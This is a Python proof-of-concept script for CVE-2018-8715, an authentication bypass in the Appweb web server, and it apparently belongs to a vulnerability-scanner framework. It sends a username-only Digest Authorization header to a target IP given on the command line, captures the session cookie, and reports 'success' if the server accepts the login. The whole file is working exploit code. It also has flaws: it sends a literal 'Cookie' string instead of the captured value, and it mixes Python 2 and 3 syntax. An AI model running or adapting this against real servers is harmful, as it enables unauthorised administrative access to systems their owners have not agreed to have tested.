#!/usr/bin/env python
#-*- coding: utf-8 -*-
import requests
import sys
import re
sys.path.append('..\\lib')
from json_parse import Jsonparse




class appweb(object):
	def __init__(self,ip,port,level):
		self.ip = ip
		self.port = port
		self.level = level
		
	def run(self):
		user = 'admin' #测试环境默认用户，公网测试应给user修改为admin
		headers1 = {
			'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0)',
			'Authorization':'Digest username='+user
		}
		data = {"username":"1234"}
		login_url = 'http://'+ self.ip +':'+ str(self.port)
		try:
			r1 = requests.get(url = login_url, headers = headers1, timeout = self.level)
			if r1.status_code == 200:
				test = r1.headers['Set-Cookie']
				if "-http-session" in test:
					re_result = re.findall(r'-http-session-=(.+?);',str(test))
					re_result = str(re_result)
					re_result = re_result.replace("[","")
					re_result = re_result.replace("]","")
					re_result = re_result.replace("'","")
					if len(re_result):
						Cookie = re_result
					else:
						exit(1)
				else:
					exit(1)
			
			headers2 = {
				'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0)',
				'Authorization':'Digest username='+user,
				'-http-session-':"Cookie"
			}
			r2 = requests.post(url = login_url, data = data, headers = headers2, timeout = self.level)
			#print(r2.status_code)
			if r2.status_code == 200:
				print ('success')
				exit(233)
			else:
				print "NO Vul, CVE-2018-8715!"
				exit(1)
		except Exception as e:
			print(e)
			exit(-1)


if __name__ == '__main__':
	jsonfile = sys.argv[1] + '\\poc\\lib\\config.json'
	jsonobj = Jsonparse(jsonfile)
	jsondata = jsonobj.parse()
	targetip = sys.argv[2]
	timeout = jsondata['timeout2']
	port = sys.argv[3]
	obj = appweb(targetip, port, timeout)
	obj.run()
